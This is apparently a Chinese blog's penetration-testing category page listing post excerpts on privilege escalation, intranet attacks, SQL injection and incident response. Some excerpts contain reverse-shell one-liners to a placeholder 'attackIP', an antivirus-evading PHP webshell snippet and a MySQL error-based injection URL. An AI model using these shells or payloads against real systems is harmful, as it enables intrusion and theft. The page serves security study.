渗透测试
文章平均质量分 58
逝之君
这个作者很懒,什么都没留下…
展开
-
安卓应用8.0以上模拟器支持测试办法
首先介绍个模拟器,名叫Genymotion,这个最高可以支持安卓10版本的模拟器。具体的安装介绍可以自己百度,非常简单,这里就不赘述了。本篇博客主要讲点干货。首先,连接ADB:在Genymotion中要连接ADB首先要使用自定义的SDK,可以在如下连接中下载:https://android-sdk.en.softonic.com/下载完解压出来后,进入设置:然后设置好路径:下面说没有包含,不用管,直接使用Genymotion目录中tools文件夹内的adb跑命令:原创 2020-12-15 15:36:30 · 6120 阅读 · 0 评论 -
root下安卓7以上添加系统信任证书
偷个懒直接复制连接添加证书具体步骤https://zhuanlan.zhihu.com/p/259255855另外附上多开夜神模拟器adb连接https://blog.csdn.net/weixin_45480533/article/details/104995461转载 2020-10-19 23:49:31 · 3116 阅读 · 0 评论 -
使用burp插件自动更新JS中的hash签名
这次测试遇到了些问题,踩了一些坑,为后来者记。 本次测试遇到的主要问题是服务端要验证sign值,sign值由sha1(salt+post data)生成,我如果要更改post data进行测试的话,就必须更新sign值。所以就编写了一个burp小插件自动更新。在插件编写完成后,发现存在中文乱码导致hash值生成错误,这个问题问了小伙伴也没有好的办法,最后灵光一现解决了,如下为解决办法:将burp编码设置为utf-8,很多教程只简单地叫更改字体然后在插件代码中将b...原创 2020-06-30 13:32:25 · 2266 阅读 · 0 评论 -
Apache shiro1.2.4 Getshell
方法一利用JRMPClient反弹shell方式Bash:bash -i >& /dev/tcp/attackIP/7777 0>&1/bin/bash -i > /dev/tcp/attackIP/7777 0<&1 2>&10<&196;exec 196<>/dev/tcp/attackIP/7777; sh <&196 >&196 2>&196P转载 2020-06-16 19:29:02 · 753 阅读 · 0 评论 -
Linux 提权的各种姿势总结
这篇讲一些关于 Linux 提权的方法,也是参考网上的一些提权方式,对于刚接触 Linux 提权的伙伴来说,需要花不少时间去理解,所以这里是以个人通俗易懂的思路去写,希望能帮到热爱学习的朋友,先写这些提权方法。若有更好的提权方式,欢迎老哥们在评论里补充一下。提权可能需要反弹 bash ,因为脚本语言无法形成管道,需要创造一个管道才能进行后续的操作,比如溢出成功之后返回一个 root 权限的 s...转载 2020-02-21 16:38:06 · 4065 阅读 · 0 评论 -
适用于渗透测试不同阶段的工具收集整理
Red Teaming / Adversary Simulation Toolkit内容侦察 武器化 交货 命令与控制 横向运动 建立立足点 升级特权 数据泄露 杂项 参考侦察主动情报收集EyeWitness:可用于网站截图,以及提供一些服务器头信息,并在可能的情况下识别默认凭据。。https://github.com/ChrisTruncer/EyeWitne...转载 2020-02-05 14:20:43 · 3170 阅读 · 0 评论 -
安卓逆向基础学习
才开始学习安卓逆向,从java到dex再到smali,一步一步认识,学习,了解看懂smali语法。首先目前网上的学习教程都是从游戏破解开始。游戏破解第一去内购。我们可以用android studio 的monitor来进行查看logcat,以此来定位敏感词然后用Android killer全局搜索敏感词,例如“支付失败,支付成功”等。然后找到相关函数,类似onsuccess/paysuccess等...原创 2018-03-06 12:00:25 · 2126 阅读 · 1 评论 -
随便写写,怕自己忘了(二)
这段时间遇到比较好玩的,大概提几点吧,怕自己忘了。上传文件,能任意上传,但是解释失败,报错编译失败?过滤找到规则,是检验文件头。这个时候,把图片马除文件头以外的内容全删除,有奇效。getshell这是一个大型系统的通杀。自己体会领悟吧对了,再提一点,有些时候报错,不是因为你马有问题,可能是你做昏头了,忘了是linux还是win,cmd=ls,win能不报错吗?再说个应急响应的。刚亲眼见证大佬20分...原创 2018-03-13 16:38:43 · 325 阅读 · 0 评论 -
php一句话木马的老生常谈,可过D盾,安全狗
首发T00ls,原文地址https://www.t00ls.net/thread-45367-1-1.html这边也是才进t00ls,算是一个小小的分享吧。首先是过安全狗,这里讲下怎么一步步过安全狗。首先下面这个马很简单,只用了一个变量覆盖,所以,不出所料被杀了 $b=$_POST['x']; $a='b'; @assert($$a); 马被杀了那肯定要想...原创 2018-04-19 10:38:42 · 5761 阅读 · 0 评论 -
应急响应基础笔记
应急响应笔记基础知识Linux操作系统基础一些常见的命令必须熟悉:ls怎么按照时间排序列出当前目录文件? ls实现列文件按时间排序 1) ls -lt 时间最近的在前面 2) ls -ltr 时间从前到后stat命令是干嘛的? 显示文件详细信息,访问时间、内容修改时间、状态修改时间lsof的作用是什么?lsof每一列分别代表什么? ...原创 2018-04-26 17:24:49 · 1251 阅读 · 0 评论 -
互联网企业安全高级指南读书笔记(3)
第八章 入侵感知体系主机入侵检测1.开源:OSSECMIG:救火利器OSquery:有一定IDC规模,有一定安全开发能力,对入侵检测有基于大数据理解的公司2.自研:架构设计: 行业法规需求 基础安全需求 企业自身的特殊安全风险需求 运维体系\网络环境适应Agent功能模块: 基线安全 ...原创 2018-05-07 22:05:14 · 315 阅读 · 0 评论 -
内网备忘录(超级全)
作者:tom0li文章内容没谈snmp利用,可以去乌云等社区获取,没有后续内网持久化,日志处理,bypass uac等内容。Webshell测试主站,搜wooyun历史洞未发现历史洞,github,svn,目录扫描未发现敏感信息,无域传送,端口只开了80端口,找到后台地址,想爆破后台,验证码后台验证,一次性,用ocr识别,找账号,通过google,baidu,bing等搜索,相关邮箱...转载 2018-08-06 13:09:39 · 2280 阅读 · 0 评论 -
史上最强内网渗透知识点总结
https://mp.weixin.qq.com/s?__biz=MzI5MDQ2NjExOQ==&mid=2247487491&idx=1&sn=270336c6cca79b4a4e5d777d41ce71b7&chksm=ec1e202bdb69a93dba0f48f973132958c95d86b2db2b6d70b8ddd1cbe41c187fa08ca4c...转载 2019-01-13 22:33:14 · 7387 阅读 · 0 评论 -
SQL注入与防御研究(一)
本文持续更新。为SQL注入攻击与防御第二版读后感第一章SQL注入产生过程:1.字符处理不当 '作为分界线。2.类型处理不当 数字型,没加单引号,直接可继续执行命令。 LOAD_FILE, SELECT INTO OUTFILE3.查询语句组装不当 $SQL = "SELECT". $_GET["column1"]. ",". $_...原创 2019-01-13 22:32:56 · 711 阅读 · 0 评论 -
备战OSCP——缓冲区溢出实战(一)
如题所示,为了备战OSCP的缓冲区溢出,特开新篇。本系列所有的例子均可以在git上找到,链接为:https://github.com/freddiebarrsmith/Buffer-Overflow-Exploit-Development-Practice本次所用的是第一个例子,brainpan.exe.没记错的话应该是出自vulnbox。首先第一步,验证程序,使用od打开brainp...原创 2019-05-23 13:37:26 · 2669 阅读 · 0 评论 -
从面试题中学Web安全
转载自90sec根据 Github 上的面经总结的一些安全岗面试的基础知识,这些基础知识不仅要牢记,而且要熟练操作,分享给大家,共勉。如果有漏掉的大家可以留言或是联系作者补充,谢谢。1.对Web安全的理解我觉得 Web 安全首先得懂 Web、第三方内容、Web 前端框架、Web 服务器语言、Web 开发框架、Web 应用、Web容器、存储、操作系统等这些都要了解,然后较为常见且危害较大的,SQL ...转载 2018-03-22 13:07:20 · 6114 阅读 · 0 评论 -
Win提权思路,方法,工具(小总结)
介绍windows提权总是被归结为适当的枚举。但要完成适当的枚举,你需要知道要检查和查找的内容。这通常需要伴随着经验的丰富而对系统非常熟悉。起初特权升级看起来像是一项艰巨的任务,但过了一段时间,你就开始过滤哪些是正常的东西,而哪些不是正常的东西。最终变得更容易,因为你知道要寻找什么了,而不是挖掘希望在干草堆中找到那根针的所有东西。希望本指南能为你的入门提供良好的基础知识。所以本指南主要集中在枚举方...转载 2018-02-26 11:31:01 · 2341 阅读 · 0 评论 -
从webshell开始的内网入侵
一个关于内网入侵的小总结原创 2017-08-10 10:49:46 · 3172 阅读 · 0 评论 -
入侵取证调查
webshell调查取证转载 2017-08-21 15:06:55 · 982 阅读 · 0 评论 -
Web渗透测试求职问答大全
0x00前言 如果我们要面试一个渗透测试工程师,其中一些经典的问题是必要会被问到的,所以本文就这些方面进行一个比较基础的总结,希望这些总结会对大家面试有所帮助。更重要的是,本文将非常非常具体地分析每一个步骤、所需的工具、思路等等0x02 常见问答1 拿到一个待检测的站,你觉得应该先做什么?答:1IP域名类查询:http://www.aizhan.com/ http://转载 2017-08-21 15:54:20 · 782 阅读 · 0 评论 -
Web之困
随着web安全在社会各界的关注度不断提高,整体的安全水平也在不断的上升,从以前阿D,明小子横扫互联网,到现在互联网企业基本告别注入,web渗透测试,仿佛进入了一个瓶颈。 现如今,只要公司安全意识到位,运维及时更新补丁,服务器在一定程度上就已经很难攻破。再加上各种厂商的免费waf,web端的突破如果没有绕过,那便基本只能搁置一旁。 各类安全编程规范的制定,更是原创 2017-10-10 10:59:38 · 822 阅读 · 0 评论 -
sqlmap一力破十会
因自身需要转载,当工具书使用:转载自http://www.cnblogs.com/r00tuser/p/7252796.html前言在早之前我对于tamper的使用一直都是停留在错误的思维。想着bypass,应该要先手动fuzz出规则来,然后再写成tamper使用。直到今天,才察觉根本不需要一定要fuzz出具体的规则来,无脑堆叠tamper,只要能够过就行了。转载 2017-11-08 09:20:08 · 1197 阅读 · 0 评论 -
Scanners Box
转载自:https://github.com/We5ter/Scanners-BoxScanners Box是一个集合github平台上的安全行业从业者自研开源扫描器的仓库,包括子域名枚举、数据库漏洞扫描、弱口令或信息泄漏扫描、端口扫描、指纹识别以及其他大型扫描器或模块化扫描器,同时该仓库只收录各位网友自己编写的一般性开源扫描器,类似nmap、w3af等知名扫描工具不收录。子域转载 2017-11-06 17:29:21 · 842 阅读 · 0 评论 -
某活动技术点总结
因为特殊原因,所以只记录心得技术点,看不懂就别看了。情报就是一切。这句话真的是让我觉得汗颜无比啊。开场别人已经拿shell了,我还摸不着北。nmap没毛病,结果别人jboss拿的shell。这个地方记住,关键IP要-p-,扫描全端口,不能放过。弱口令要检查上传点,上传点要多发掘,如果一个不能绕过就要去尝试另外的,把链接都点一下,万一就有隐藏的上传点。x站其实难度都不大,就是原创 2017-12-04 22:53:44 · 229 阅读 · 0 评论 -
smb(ms17-010)远程命令执行之msf
本次用到的环境:kali(2016.2)32位系统.ip地址:192.168.1.104目标靶机为:win7sp1x64系统(关闭防火墙),ip地址:192.168.1.105具体的步骤如下:kali系统下安装wine32:apt-get install wine32 用wine32执行cmd.exewine cmd.转载 2017-12-14 11:13:10 · 4698 阅读 · 0 评论 -
犀利的 oracle 注入技术
原来一直不知道oracle注入可以你拿shell,特意记录下以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成 /xxx.jsp?id=1 and '1' 的形式即可。(用" 'a'|| "是为了让语句返回true值) 语句有点长,可能要用post提交。 以下是原创 2017-11-27 14:56:25 · 1086 阅读 · 0 评论 -
端口渗透总结
总是会忘这些东西,记下来,当工具吧服务默认端口公认端口(Well Known Ports):0-1023,他们紧密绑定了一些服务;注册端口(Registered Ports):1024-49151,他们松散的绑定了一些服务;动态/私有:49152-65535,不为服务分配这些端口;文件共享服务端口渗透FTP服务FTP服务:ftp服务我分为两种转载 2017-12-26 17:30:32 · 6382 阅读 · 0 评论 -
从零开始内网渗透学习
柠檬的内网合集,第二次看,感觉就不一样了。。。虽然我们同届,但感觉相差甚远啊,努力努力。Team:Syclover Author:L3m0n Email:iamstudy@126.com[TOC]###域环境搭建 准备: DC: win2008 DM: win2003 DM: winxpwin2008(域控) 1、修改计算机名: 2、配置固定ip转载 2017-12-26 17:40:24 · 9862 阅读 · 0 评论 -
随便写写,怕自己忘了(一)
遇到file=_______或者home=________之类的出现在网址里,看看源码,有可能在源码里会有展示,这个时候可能有xss当然了,任意网站的跳转也是有的,这个看运气,爱笑的人说不定,http不行https就成功访问了?其实我觉得如果能访问内网,那就更好玩了,毕竟这是SSRF的时代[手动滑稽脸]然后嘛,今天碰巧看到,js调用,在数据没问题的情况下,你在burp没原创 2017-12-26 17:01:53 · 221 阅读 · 0 评论 -
对WordPress网站进行渗透测试 – 详解
WordPress是一个专注于PHP和MySQL的免费在线开源内容托管系统。这是一个功能强大且使用最多的博客工具。由于WordPress使用过程中出现了太多的错误,所以需要提高安全性。WordPress渗透测试对于发现漏洞并保护您的WordPress博客非常重要。安全研究人员丹尼尔·西德说,在2016年,至少有15769个甚至更多的WordPress网站已经被入侵。根据Su转载 2018-01-13 23:20:44 · 5264 阅读 · 0 评论 -
ElasticSearch未授权访问的检测与利用思路
基本说明VulBOXhttps://book.thief.one/webying-yong-lou-dong/136-elasticsearchwei-shou-quan-fang-wen-lou-dong.html延伸阅读https://www.ichunqiu.com/course/1413Redis未授权访问其他 NoSQL未授权访问MongoDB、Redis转载 2017-12-29 15:17:42 · 9799 阅读 · 0 评论 -
应急响应
1、cat /etc/passwd 未发现陌生用户和可疑root权限用户。2、netstat -anp 查看所有进程及pid号,未发现异常连接。3、last 查看最近登录用户,未发现异常4、cat /etc/profile 查看系统环境变量,未发现异常5、ls -al /etc/rc.d/rc3.d ,查看当前级别下开机启动程序,未见异常(有一些脸生,只好利用搜索引转载 2018-01-17 17:07:58 · 473 阅读 · 0 评论 -
从kali到msf再到veil免杀的一条龙踩坑服务指南
因为研究需要,特将过程进行记录:0X01 添加kali rolling官方源我这里将原来的源全部注释了,仅使用了kali的rolling官方源:vi /etc/apt/sources.list[html] view plain copydeb http://http.kali.org/kali kali-rolli原创 2017-11-02 11:26:59 · 1797 阅读 · 0 评论 -
MySQL暴错注入方法整理
1、通过floor暴错/*数据库版本*/http://www.hackdig.com/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1)转载 2018-01-09 17:10:47 · 669 阅读 · 0 评论 -
渗透工具之msf
转载自csdn:忆蓉之心简介它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。环境工具:msf4伪装木马原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线。转载 2017-08-17 09:47:14 · 37979 阅读 · 3 评论